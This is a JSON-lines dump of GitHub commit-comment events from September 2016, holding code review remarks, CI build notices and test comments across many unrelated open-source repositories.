{"id":"4519288576","type":"CommitCommentEvent","actor":{"login":"Paul044"},"repo":{"name":"Paul044/rs-task1"},"payload":{"comment":{"id":18905728,"position":1,"line":1,"path":"README.md","commit_id":"85462feaf03bb20ca0a6c6624fb572a914f5b7b2","created_at":"2016-09-06T05:22:58Z","updated_at":"2016-09-06T05:22:58Z","body":"1"}},"created_at":"2016-09-06T05:22:58Z"}
{"id":"4519290616","type":"CommitCommentEvent","actor":{"login":"hycugb"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18905735,"position":295,"line":295,"path":"huangyi/role/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-06T05:23:53Z","updated_at":"2016-09-06T05:23:53Z","body":"这里确实需要存储一个判断结果"}},"created_at":"2016-09-06T05:23:53Z"}
{"id":"4519291141","type":"CommitCommentEvent","actor":{"login":"leo-yuriev"},"repo":{"name":"ReOpen/ReOpenLDAP"},"payload":{"comment":{"id":18905736,"position":null,"line":null,"path":null,"commit_id":"9109b36e0de674da39d648efedf531f82f0f9b17","created_at":"2016-09-06T05:24:07Z","updated_at":"2016-09-06T05:24:07Z","body":"TeamCity ReOpenLDAP :: devel [Build 307](https://binbug.bigbrother-matrix.ru/teamcity/viewLog.html?buildId=2777&buildTypeId=ReOpenLDAP_Devel&guest=1) is now running\n"}},"created_at":"2016-09-06T05:24:07Z"}
{"id":"4519291142","type":"CommitCommentEvent","actor":{"login":"leo-yuriev"},"repo":{"name":"ReOpen/ReOpenLDAP"},"payload":{"comment":{"id":18905737,"position":null,"line":null,"path":null,"commit_id":"01b606df5e19f4892ef02e94e19b073737c4d07d","created_at":"2016-09-06T05:24:07Z","updated_at":"2016-09-06T05:24:07Z","body":"TeamCity ReOpenLDAP :: devel [Build 307](https://binbug.bigbrother-matrix.ru/teamcity/viewLog.html?buildId=2777&buildTypeId=ReOpenLDAP_Devel&guest=1) is now running\n"}},"created_at":"2016-09-06T05:24:07Z"}
{"id":"4519291460","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18905738,"position":null,"line":null,"path":null,"commit_id":"e45b489e09ab70f63e5a03657d673d5feaf0b2c7","created_at":"2016-09-06T05:24:13Z","updated_at":"2016-09-06T05:24:13Z","body":"os_2_0_no_apppathhelpers (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e45b489e09ab70f63e5a03657d673d5feaf0b2c7-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-06T05:24:13Z"}
{"id":"4519298054","type":"CommitCommentEvent","actor":{"login":"shurcooL"},"repo":{"name":"gopherjs/gopherjs"},"payload":{"comment":{"id":18905756,"position":null,"line":null,"path":null,"commit_id":"3ed85366b3d5dd0b2474fc4ffb1bd739b2914f84","created_at":"2016-09-06T05:27:02Z","updated_at":"2016-09-06T05:27:02Z","body":"Relevant, see https://github.com/gopherjs/gopherjs/issues/510."}},"created_at":"2016-09-06T05:27:02Z"}
{"id":"4519301823","type":"CommitCommentEvent","actor":{"login":"hycugb"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18905765,"position":246,"line":246,"path":"huangyi/role/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-06T05:28:44Z","updated_at":"2016-09-06T05:28:44Z","body":"获取列表的请求确实还差一个异常处理的机制"}},"created_at":"2016-09-06T05:28:44Z"}
{"id":"4519306178","type":"CommitCommentEvent","actor":{"login":"richard1122"},"repo":{"name":"GyrosWorkshop/Wukong"},"payload":{"comment":{"id":18905772,"position":null,"line":null,"path":null,"commit_id":"80834ed4d4cddbc48da21ba7b4b6c0e037f6e45e","created_at":"2016-09-06T05:30:29Z","updated_at":"2016-09-06T05:30:29Z","body":"我猜这里 volatile 不是这么用的，volatile只能描述这个对象可能被多个线程赋值/访问吧。对于我们这种只被赋值一次的情况，用这个应该没意义。"}},"created_at":"2016-09-06T05:30:29Z"}
{"id":"4519314825","type":"CommitCommentEvent","actor":{"login":"adundovi"},"repo":{"name":"CRPropa/CRPropa3"},"payload":{"comment":{"id":18905782,"position":9,"line":12,"path":"src/module/common.cpp","commit_id":"2d131275041e6d7431b47f655b41d59b9caaf57d","created_at":"2016-09-06T05:34:20Z","updated_at":"2016-09-06T05:34:20Z","body":"The order of locations where CRPropa is looking for the data folder should be different - first env variables, then a local data folder, then everything else... For example, in a case of testing the code, before \"make install\", CRPropa should look for the data inside the \"build\" folder, not in the install path... right? @DavidWalz @geromueller "}},"created_at":"2016-09-06T05:34:20Z"}
{"id":"4519321393","type":"CommitCommentEvent","actor":{"login":"Ascencio14"},"repo":{"name":"bayuelo/camaleon"},"payload":{"comment":{"id":18905797,"position":null,"line":null,"path":null,"commit_id":"9ad654dbc4abbd964222757cb334318be20257d2","created_at":"2016-09-06T05:37:15Z","updated_at":"2016-09-06T05:37:15Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;dvfYaHUc&#x2F;14-modulo-sucursal-interfaz-grafica\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Módulo Sucursal - Interfaz Grafica</a>"}},"created_at":"2016-09-06T05:37:15Z"}
{"id":"4519321849","type":"CommitCommentEvent","actor":{"login":"JoakimLarsson"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18905798,"position":null,"line":null,"path":null,"commit_id":"9d93c07c6615fde52f9de0c096926c19793c2e0d","created_at":"2016-09-06T05:37:26Z","updated_at":"2016-09-06T05:37:26Z","body":"Great, whatabout rom naming conventions, I think that would be quite valuable too, if there is one."}},"created_at":"2016-09-06T05:37:26Z"}
{"id":"4519330510","type":"CommitCommentEvent","actor":{"login":"outconn1"},"repo":{"name":"nammafunteam/nammarepository"},"payload":{"comment":{"id":18905811,"position":null,"line":null,"path":null,"commit_id":"343ebfaa150840ab2da875b9effe512d6440ebc5","created_at":"2016-09-06T05:41:06Z","updated_at":"2016-09-06T05:41:06Z","body":"comment 123"}},"created_at":"2016-09-06T05:41:06Z"}
{"id":"4519331520","type":"CommitCommentEvent","actor":{"login":"yangyinyun"},"repo":{"name":"yangyinyun/master-yyy-tester"},"payload":{"comment":{"id":18905812,"position":null,"line":null,"path":null,"commit_id":"0f3592162dd0703efcb34264049dd686a36b4e9f","created_at":"2016-09-06T05:41:31Z","updated_at":"2016-09-06T05:41:31Z","body":"ttttt"}},"created_at":"2016-09-06T05:41:31Z"}
{"id":"4519332988","type":"CommitCommentEvent","actor":{"login":"artoj"},"repo":{"name":"cutechess/cutechess"},"payload":{"comment":{"id":18905816,"position":4,"line":275,"path":"projects/gui/src/mainwindow.cpp","commit_id":"65506e2f2a1c26b64e88157a785c8342a09ce040","created_at":"2016-09-06T05:42:08Z","updated_at":"2016-09-06T05:42:08Z","body":"No, it's not accessible. The automatic handling of menu items only happens when the item exists in a menu. Maybe move Game Wall / Game Database to Tools menu also?"}},"created_at":"2016-09-06T05:42:08Z"}
{"id":"4519333572","type":"CommitCommentEvent","actor":{"login":"outconn1"},"repo":{"name":"nammafunteam/nammarepository"},"payload":{"comment":{"id":18905817,"position":null,"line":null,"path":null,"commit_id":"343ebfaa150840ab2da875b9effe512d6440ebc5","created_at":"2016-09-06T05:42:23Z","updated_at":"2016-09-06T05:42:23Z","body":"comment"}},"created_at":"2016-09-06T05:42:23Z"}
{"id":"4519334923","type":"CommitCommentEvent","actor":{"login":"outconn1"},"repo":{"name":"nammafunteam/nammarepository"},"payload":{"comment":{"id":18905819,"position":null,"line":null,"path":null,"commit_id":"343ebfaa150840ab2da875b9effe512d6440ebc5","created_at":"2016-09-06T05:42:59Z","updated_at":"2016-09-06T05:42:59Z","body":"comment 22"}},"created_at":"2016-09-06T05:42:59Z"}
{"id":"4519335721","type":"CommitCommentEvent","actor":{"login":"Drifftr"},"repo":{"name":"wso2/devstudio-tooling-bps"},"payload":{"comment":{"id":18905821,"position":18,"line":108,"path":"plugins/org.wso2.developerstudio.humantaskeditor/src/org/wso2/developerstudio/humantaskeditor/editors/HumanTaskMultiPageEditorContributor.java","commit_id":"96dbdd3f33e33ec98877884767360bd2d62409fc","created_at":"2016-09-06T05:43:17Z","updated_at":"2016-09-06T05:43:17Z","body":"Fixed in https://github.com/wso2/devstudio-tooling-bps/pull/28/commits/2581f5ddab9d98e149879c6365b9582961715d55"}},"created_at":"2016-09-06T05:43:17Z"}
{"id":"4519336125","type":"CommitCommentEvent","actor":{"login":"blinoff82"},"repo":{"name":"nickdoherty81/android_manifest"},"payload":{"comment":{"id":18905823,"position":6,"line":485,"path":"default.xml","commit_id":"56ac9c2875682b2021c06a24a643e5f8fe54dbb5","created_at":"2016-09-06T05:43:27Z","updated_at":"2016-09-06T05:43:27Z","body":"End of this string - excess symbol \">\""}},"created_at":"2016-09-06T05:43:27Z"}
{"id":"4519336163","type":"CommitCommentEvent","actor":{"login":"Drifftr"},"repo":{"name":"wso2/devstudio-tooling-bps"},"payload":{"comment":{"id":18905824,"position":46,"line":46,"path":"org.wso2.developerstudio.humantaskeditor/src/org/wso2/developerstudio/humantaskeditor/wizards/HumanTaskWizard.java","commit_id":"f8b7953621711df18f9e0c0395b288bea3be663f","created_at":"2016-09-06T05:43:28Z","updated_at":"2016-09-06T05:43:28Z","body":"Fixed in https://github.com/wso2/devstudio-tooling-bps/pull/28/commits/2581f5ddab9d98e149879c6365b9582961715d55"}},"created_at":"2016-09-06T05:43:28Z"}
{"id":"4519337565","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18905829,"position":59,"line":57,"path":"src/pocketmine/scheduler/DServerTask.php","commit_id":"63100a7b80e36c3a240d4c5d47af467bda5f9e64","created_at":"2016-09-06T05:44:05Z","updated_at":"2016-09-06T05:44:05Z","body":"(^_^) what he said ^ and this shouldn't be in the server core anyway in my opinion."}},"created_at":"2016-09-06T05:44:05Z"}
{"id":"4519341572","type":"CommitCommentEvent","actor":{"login":"jojoe77777"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18905840,"position":59,"line":57,"path":"src/pocketmine/scheduler/DServerTask.php","commit_id":"63100a7b80e36c3a240d4c5d47af467bda5f9e64","created_at":"2016-09-06T05:45:43Z","updated_at":"2016-09-06T05:45:43Z","body":"```elseif($time = $this->autotimes)```\r\n```elseif($time === $this->autotimes)```"}},"created_at":"2016-09-06T05:45:43Z"}
{"id":"4519344335","type":"CommitCommentEvent","actor":{"login":"akrystian"},"repo":{"name":"europeana/Europeana-Cloud"},"payload":{"comment":{"id":18905850,"position":374,"line":604,"path":"service/mcs/persistent/src/main/java/eu/europeana/cloud/service/mcs/persistent/cassandra/CassandraDataSetDAO.java","commit_id":"9f3ce055de608d0aaa5673291790404b437bcd0e","created_at":"2016-09-06T05:46:55Z","updated_at":"2016-09-06T05:46:55Z","body":"It is safer to use \"<\", \"<=\", \">=\", \">\" rather than \"==\" or \"!=\" in case of counters."}},"created_at":"2016-09-06T05:46:55Z"}
{"id":"4519346333","type":"CommitCommentEvent","actor":{"login":"jumjum888"},"repo":{"name":"9683/python-bitcoinlib"},"payload":{"comment":{"id":18905853,"position":null,"line":null,"path":null,"commit_id":"dd93193dc921ab2ec27d26b2c10d5fc48d5cf354","created_at":"2016-09-06T05:47:45Z","updated_at":"2016-09-06T05:47:45Z","body":"dd93193"}},"created_at":"2016-09-06T05:47:45Z"}
{"id":"4519347836","type":"CommitCommentEvent","actor":{"login":"Daniel17sep"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":18905855,"position":null,"line":null,"path":null,"commit_id":"fab6af536eb328c4ddb386e67f6f34a1cf3b4b1d","created_at":"2016-09-06T05:48:22Z","updated_at":"2016-09-06T05:48:22Z","body":"That looks good so far? I don't know JavaScript so I can only understand so much of that."}},"created_at":"2016-09-06T05:48:22Z"}
{"id":"4519347853","type":"CommitCommentEvent","actor":{"login":"Senorsen"},"repo":{"name":"GyrosWorkshop/Wukong"},"payload":{"comment":{"id":18905856,"position":null,"line":null,"path":null,"commit_id":"80834ed4d4cddbc48da21ba7b4b6c0e037f6e45e","created_at":"2016-09-06T05:48:23Z","updated_at":"2016-09-06T05:48:23Z","body":"那我不太确定，在多线程情况下，这种Dictionary是否是thread-safe的，我去换一个，提个PR"}},"created_at":"2016-09-06T05:48:23Z"}
{"id":"4519349665","type":"CommitCommentEvent","actor":{"login":"Thrax989"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":18905858,"position":null,"line":null,"path":null,"commit_id":"1fcae1b2aeab590d383111a998f8ad0becec552a","created_at":"2016-09-06T05:49:10Z","updated_at":"2016-09-06T05:49:10Z","body":"we will be leaving the acklay_elder.lua acklay_youngling.lua alone they wont be pets only acklay will be a pet."}},"created_at":"2016-09-06T05:49:10Z"}
{"id":"4519350115","type":"CommitCommentEvent","actor":{"login":"richard1122"},"repo":{"name":"GyrosWorkshop/Wukong"},"payload":{"comment":{"id":18905859,"position":null,"line":null,"path":null,"commit_id":"80834ed4d4cddbc48da21ba7b4b6c0e037f6e45e","created_at":"2016-09-06T05:49:21Z","updated_at":"2016-09-06T05:49:21Z","body":"那应该用加锁或者 concurrentdictionary\r\n\r\nOn Tue, Sep 6, 2016 at 1:48 PM Zhang Sen <notifications@github.com> wrote:\r\n\r\n> 那我不太确定，在多线程情况下，这种Dictionary是否是thread-safe的，我去换一个，提个PR\r\n>\r\n> —\r\n> You are receiving this because you commented.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/GyrosWorkshop/Wukong/commit/80834ed4d4cddbc48da21ba7b4b6c0e037f6e45e#commitcomment-18905856>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/ACarhcnU-4hLZgNc0xAMr5pOhRdExXSuks5qnP6ngaJpZM4J1ebN>\r\n> .\r\n>\r\n"}},"created_at":"2016-09-06T05:49:21Z"}
{"id":"4519351527","type":"CommitCommentEvent","actor":{"login":"heikkil"},"repo":{"name":"lujun9972/org-preview-html"},"payload":{"comment":{"id":18905861,"position":null,"line":null,"path":null,"commit_id":"1f648d513661ede410b162ac99e6b19d461e127c","created_at":"2016-09-06T05:49:59Z","updated_at":"2016-09-06T05:49:59Z","body":"There is no need to change the Created: meta field. I thought MELPA use it for tracking, but I was wrong.  I think it is the Version: field that needs to be updated if MELPA is to create a new release after a commit.\r\n\r\nI'll leave creating the MELPA pull request to you."}},"created_at":"2016-09-06T05:49:59Z"}
{"id":"4519352671","type":"CommitCommentEvent","actor":{"login":"Vaikl"},"repo":{"name":"Vaikl/RandomGod"},"payload":{"comment":{"id":18905864,"position":null,"line":null,"path":null,"commit_id":"411aeda53f01ccb87e7a41df6b93e52b2c22ddd5","created_at":"2016-09-06T05:50:28Z","updated_at":"2016-09-06T05:50:28Z","body":"group 2\r\nIsit\r\nVanya"}},"created_at":"2016-09-06T05:50:28Z"}
{"id":"4519353157","type":"CommitCommentEvent","actor":{"login":"jumjum888"},"repo":{"name":"9683/python-bitcoinlib"},"payload":{"comment":{"id":18905865,"position":null,"line":null,"path":null,"commit_id":"43530c8837857026a6a90d29e1ac7ea83be5665e","created_at":"2016-09-06T05:50:40Z","updated_at":"2016-09-06T05:50:40Z","body":"43530c8"}},"created_at":"2016-09-06T05:50:40Z"}
{"id":"4519354655","type":"CommitCommentEvent","actor":{"login":"nammafunteam"},"repo":{"name":"outconn1/testConnector"},"payload":{"comment":{"id":18905867,"position":null,"line":null,"path":null,"commit_id":"894fe80e4cdc809a09772d1295f9aaa6fc877c67","created_at":"2016-09-06T05:51:15Z","updated_at":"2016-09-06T05:51:15Z","body":"comment"}},"created_at":"2016-09-06T05:51:15Z"}
{"id":"4519355670","type":"CommitCommentEvent","actor":{"login":"jumjum888"},"repo":{"name":"9683/python-bitcoinlib"},"payload":{"comment":{"id":18905870,"position":null,"line":null,"path":null,"commit_id":"43530c8837857026a6a90d29e1ac7ea83be5665e","created_at":"2016-09-06T05:51:40Z","updated_at":"2016-09-06T05:51:40Z","body":"43530c8"}},"created_at":"2016-09-06T05:51:40Z"}
{"id":"4519357305","type":"CommitCommentEvent","actor":{"login":"Drifftr"},"repo":{"name":"wso2/devstudio-tooling-bps"},"payload":{"comment":{"id":18905872,"position":13,"line":109,"path":"plugins/org.wso2.developerstudio.humantaskeditor/src/org/wso2/developerstudio/humantaskeditor/wizards/HumanTaskExportWizard.java","commit_id":"fd8213bb1ea8c020c2bcc2893f788ddfafb87b32","created_at":"2016-09-06T05:52:20Z","updated_at":"2016-09-06T05:52:20Z","body":"This method was removed lately"}},"created_at":"2016-09-06T05:52:20Z"}
{"id":"4519359446","type":"CommitCommentEvent","actor":{"login":"tracytrle"},"repo":{"name":"tracytrle/gitexp"},"payload":{"comment":{"id":18905874,"position":4,"line":6,"path":"travistrle.txt","commit_id":"aeac057891c7d8a125def118000f18f5816385d1","created_at":"2016-09-06T05:53:11Z","updated_at":"2016-09-06T05:53:11Z","body":"This is amazing code. I couldn't figure it out before. Thanks for pointing it out."}},"created_at":"2016-09-06T05:53:11Z"}
{"id":"4519361216","type":"CommitCommentEvent","actor":{"login":"travistrle"},"repo":{"name":"tracytrle/gitexp"},"payload":{"comment":{"id":18905876,"position":4,"line":6,"path":"travistrle.txt","commit_id":"aeac057891c7d8a125def118000f18f5816385d1","created_at":"2016-09-06T05:53:55Z","updated_at":"2016-09-06T05:53:55Z","body":"You're very welcome."}},"created_at":"2016-09-06T05:53:55Z"}
{"id":"4519361514","type":"CommitCommentEvent","actor":{"login":"dwhall"},"repo":{"name":"bjcarne/pySX127x"},"payload":{"comment":{"id":18905878,"position":null,"line":null,"path":null,"commit_id":"f38705061a27b839131ee93486284e5c98151c84","created_at":"2016-09-06T05:54:03Z","updated_at":"2016-09-06T05:54:03Z","body":"Nice work.  Any problems with the GPIO module's callbacks (which I've read are on a separate thread) and asyncore?"}},"created_at":"2016-09-06T05:54:03Z"}
{"id":"4519363431","type":"CommitCommentEvent","actor":{"login":"jeffallen6767"},"repo":{"name":"jeffallen6767/RawWebGL"},"payload":{"comment":{"id":18905879,"position":null,"line":null,"path":null,"commit_id":"453450b321b839e1dd5b31afc04962372e5e4b5f","created_at":"2016-09-06T05:54:50Z","updated_at":"2016-09-06T05:54:50Z","body":"typo, you may want to check for this in other pages..."}},"created_at":"2016-09-06T05:54:50Z"}
{"id":"4519366891","type":"CommitCommentEvent","actor":{"login":"jumjum888"},"repo":{"name":"jlord/sheetsee"},"payload":{"comment":{"id":18905885,"position":null,"line":null,"path":null,"commit_id":"f940d3b74f6f61a87224c39cfbfdbe6ff0d5d850","created_at":"2016-09-06T05:56:11Z","updated_at":"2016-09-06T05:56:11Z","body":"f940d3b"}},"created_at":"2016-09-06T05:56:11Z"}
{"id":"4519368732","type":"CommitCommentEvent","actor":{"login":"pratyush997"},"repo":{"name":"pratyush997/ping-hide"},"payload":{"comment":{"id":18905887,"position":null,"line":null,"path":null,"commit_id":"71adcac86be261cf730f46ab0cc26eda00a3ebac","created_at":"2016-09-06T05:56:56Z","updated_at":"2016-09-06T05:56:56Z","body":".gitignore in all the repositories are up. \r\nThanks."}},"created_at":"2016-09-06T05:56:56Z"}
{"id":"4519369352","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18905890,"position":1,"line":1,"path":"src/main/webapp/WEB-INF/resources/css/issue/jquery-ui.css","commit_id":"c99eacc7cdc73cbada8ee82b9f5769ca35b1517e","created_at":"2016-09-06T05:57:12Z","updated_at":"2016-09-06T05:57:12Z","body":"when adding JS, CSS external libraries, please add minified libraries"}},"created_at":"2016-09-06T05:57:12Z"}
{"id":"4519370063","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18905891,"position":null,"line":null,"path":null,"commit_id":"bc5bcadbf22e74634380c56b72f59aa5c940e08f","created_at":"2016-09-06T05:57:28Z","updated_at":"2016-09-06T05:57:28Z","body":"Good call but already done: https://github.com/magnumripper/JohnTheRipper/commit/c762b62a7e90bfd425e1a9856ae34b55d8eb8ce3#commitcomment-18903236"}},"created_at":"2016-09-06T05:57:28Z"}
{"id":"4519375173","type":"CommitCommentEvent","actor":{"login":"apolukhin"},"repo":{"name":"boostorg/variant"},"payload":{"comment":{"id":18905896,"position":null,"line":null,"path":null,"commit_id":"9342505270e6e0b9396937466a6fb803186827fd","created_at":"2016-09-06T05:59:28Z","updated_at":"2016-09-06T05:59:28Z","body":"Ok, another attempt to fix the issues was made in fac387a."}},"created_at":"2016-09-06T05:59:28Z"}
{"id":"4519375899","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18905897,"position":null,"line":null,"path":null,"commit_id":"c762b62a7e90bfd425e1a9856ae34b55d8eb8ce3","created_at":"2016-09-06T05:59:46Z","updated_at":"2016-09-06T05:59:46Z","body":"> The format string was just copied from the racf format string\r\n\r\nYes but the origin of that extra asterisk was a mistake. Its use in already released formats is somewhat cemented. Unfortunately it often spreads to new formats so we need to remember to look for it :-)"}},"created_at":"2016-09-06T05:59:46Z"}
{"id":"4519376728","type":"CommitCommentEvent","actor":{"login":"kholia"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18905899,"position":null,"line":null,"path":null,"commit_id":"bc5bcadbf22e74634380c56b72f59aa5c940e08f","created_at":"2016-09-06T06:00:06Z","updated_at":"2016-09-06T06:00:06Z","body":"Great :+1: "}},"created_at":"2016-09-06T06:00:06Z"}
{"id":"4519378299","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18905919,"position":null,"line":null,"path":null,"commit_id":"4c1a251c7a5c603e2ca987335b2f1ce4197f3820","created_at":"2016-09-06T06:00:31Z","updated_at":"2016-09-06T06:00:31Z","body":"I think yes, because some Questionattribute can use it easily. Not for {ANSWERS} but for {QUESTION_CLASS} or adding some css/js etc ...\r\nreally more easy at this place than in a question object.\r\n\r\nOr : there are a \"beforeRenderPartial\" event for whole part + beforeGetEMvar (or templatereplace)."}},"created_at":"2016-09-06T06:00:31Z"}
{"id":"4519380495","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18905942,"position":5,"line":691,"path":"application/helpers/replacements_helper.php","commit_id":"b1c10d5d9f5f4f0e482c071bce787aee3864bdad","created_at":"2016-09-06T06:01:14Z","updated_at":"2016-09-06T06:01:14Z","body":"Html yes , but you can always fix html with CSS and JS."}},"created_at":"2016-09-06T06:01:14Z"}
{"id":"4519380671","type":"CommitCommentEvent","actor":{"login":"dotModded"},"repo":{"name":"NovaMods/nova-renderer"},"payload":{"comment":{"id":18905943,"position":null,"line":null,"path":null,"commit_id":"22ef915aa467337668f6010f75186405eb5d1eaa","created_at":"2016-09-06T06:01:18Z","updated_at":"2016-09-06T06:01:18Z","body":"Literally. Hitler."}},"created_at":"2016-09-06T06:01:18Z"}
{"id":"4519381683","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"zdomokos/dockpanelsuite"},"payload":{"comment":{"id":18905949,"position":null,"line":null,"path":null,"commit_id":"4fd234b26251d261ec18f82031b69d73fd5176b1","created_at":"2016-09-06T06:01:43Z","updated_at":"2016-09-06T06:01:43Z","body":"Already cherry picked in upstream."}},"created_at":"2016-09-06T06:01:43Z"}
{"id":"4519389942","type":"CommitCommentEvent","actor":{"login":"Gavin-YYC"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18905972,"position":254,"line":254,"path":"huangyi/role/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-06T06:05:03Z","updated_at":"2016-09-06T06:05:03Z","body":"1、此代码中没有用到该方法\r\n2、另外，setList里面执行getList方法，不太明白该方法的意思..."}},"created_at":"2016-09-06T06:05:03Z"}
{"id":"4519390515","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"travis-ci/packer-templates"},"payload":{"comment":{"id":18905973,"position":10,"line":71,"path":"packer-scripts/pre-chef-bootstrap","commit_id":"e691c229295d8ed708df41fdf061ce2b594a392e","created_at":"2016-09-06T06:05:15Z","updated_at":"2016-09-06T06:05:15Z","body":"Stop "}},"created_at":"2016-09-06T06:05:15Z"}
{"id":"4519391415","type":"CommitCommentEvent","actor":{"login":"HybridDog"},"repo":{"name":"HybridDog/streets"},"payload":{"comment":{"id":18905980,"position":null,"line":null,"path":null,"commit_id":"69b87ca345c90db168ef0f726e34730a0fdeccb2","created_at":"2016-09-06T06:05:34Z","updated_at":"2016-09-06T06:05:34Z","body":"Yes, it's ok,\r\nnote that (in my opinion) streets_matrix_screen_lines.png is currently not enough transparent, so the yellow pixels are too obfuscated."}},"created_at":"2016-09-06T06:05:34Z"}
{"id":"4519394019","type":"CommitCommentEvent","actor":{"login":"DethRaid"},"repo":{"name":"NovaMods/nova-renderer"},"payload":{"comment":{"id":18905983,"position":null,"line":null,"path":null,"commit_id":"22ef915aa467337668f6010f75186405eb5d1eaa","created_at":"2016-09-06T06:06:31Z","updated_at":"2016-09-06T06:06:31Z","body":"The const in the vector's template argument was causing compilation errors"}},"created_at":"2016-09-06T06:06:31Z"}
{"id":"4519394465","type":"CommitCommentEvent","actor":{"login":"NamelessCoder"},"repo":{"name":"misterboe/slickcarousel"},"payload":{"comment":{"id":18905985,"position":null,"line":null,"path":null,"commit_id":"d6cfa54f2f9e4ef30e5a7ab6fa773208b3f0f539","created_at":"2016-09-06T06:06:43Z","updated_at":"2016-09-06T06:06:43Z","body":"- Error code: 0 - Version number 1.0.0 already exists in repository.\n\n- NamelessCoder\\GizzleGitPlugins\\GizzlePlugins\\ClonePlugin:0000000007595443000000004babea34:\n  - 0: Executing Git clone command: /usr/bin/git clone --depth 1 --single-branch --branch '1.0.1' 'https://github.com/misterboe/slickcarousel.git' /tmp/d6cfa54f2f9e4ef30e5a7ab6fa773208b3f0f539/slickcarousel"}},"created_at":"2016-09-06T06:06:43Z"}
{"id":"4519395994","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"travis-ci/packer-templates"},"payload":{"comment":{"id":18905986,"position":6,"line":94,"path":"cookbooks/lib/features/basic_spec.rb","commit_id":"e691c229295d8ed708df41fdf061ce2b594a392e","created_at":"2016-09-06T06:07:19Z","updated_at":"2016-09-06T06:07:19Z","body":"Stop "}},"created_at":"2016-09-06T06:07:19Z"}
{"id":"4519396800","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"travis-ci/packer-templates"},"payload":{"comment":{"id":18905987,"position":null,"line":null,"path":null,"commit_id":"e691c229295d8ed708df41fdf061ce2b594a392e","created_at":"2016-09-06T06:07:37Z","updated_at":"2016-09-06T06:07:37Z","body":"Stop "}},"created_at":"2016-09-06T06:07:37Z"}
{"id":"4519397520","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"travis-ci/packer-templates"},"payload":{"comment":{"id":18905989,"position":null,"line":null,"path":null,"commit_id":"e691c229295d8ed708df41fdf061ce2b594a392e","created_at":"2016-09-06T06:07:54Z","updated_at":"2016-09-06T06:07:54Z","body":"Stop "}},"created_at":"2016-09-06T06:07:54Z"}
{"id":"4519399781","type":"CommitCommentEvent","actor":{"login":"kshchepanovskyi"},"repo":{"name":"crkochan/zkcopy"},"payload":{"comment":{"id":18905990,"position":null,"line":null,"path":null,"commit_id":"6cb1357f397c49ceef42c23f94e8bc8540602146","created_at":"2016-09-06T06:08:46Z","updated_at":"2016-09-06T06:08:46Z","body":"Hm, seems that I forget to update this file after one of recent changes. \r\nThanks for the fix! I will backport it to my repo soon."}},"created_at":"2016-09-06T06:08:46Z"}
{"id":"4519402871","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"WNeZRoS/dockpanelsuite"},"payload":{"comment":{"id":18905997,"position":null,"line":null,"path":null,"commit_id":"a204fe53664181f21620d9a614b3ff7a0d1ddf1c","created_at":"2016-09-06T06:10:01Z","updated_at":"2016-09-06T06:10:01Z","body":"This commit was reviewed but the change was not accepted. Up stream used another approach."}},"created_at":"2016-09-06T06:10:01Z"}
{"id":"4519404140","type":"CommitCommentEvent","actor":{"login":"AvalancheYT"},"repo":{"name":"UnraveledMC-Dev/UnraveledMCMod"},"payload":{"comment":{"id":18905998,"position":null,"line":null,"path":null,"commit_id":"3787853e0b3f51d81421999cb7ee6fb22413b6b5","created_at":"2016-09-06T06:10:27Z","updated_at":"2016-09-06T06:10:27Z","body":"This is just stupid, all he did is rename things. It is not a major config update."}},"created_at":"2016-09-06T06:10:27Z"}
{"id":"4519406513","type":"CommitCommentEvent","actor":{"login":"datakurre"},"repo":{"name":"plone/plone.app.mosaic"},"payload":{"comment":{"id":18906002,"position":null,"line":null,"path":null,"commit_id":"f3f3c78873ea8a9c39cf65fbaf3e81b524218fa3","created_at":"2016-09-06T06:11:16Z","updated_at":"2016-09-06T06:11:16Z","body":"@agitator Ping. Here I was able to \r\n\r\n  .mosaic-width-full {\r\n    .make-xs-column(12);\r\n  }\r\n\r\nJust hijack this branch."}},"created_at":"2016-09-06T06:11:16Z"}
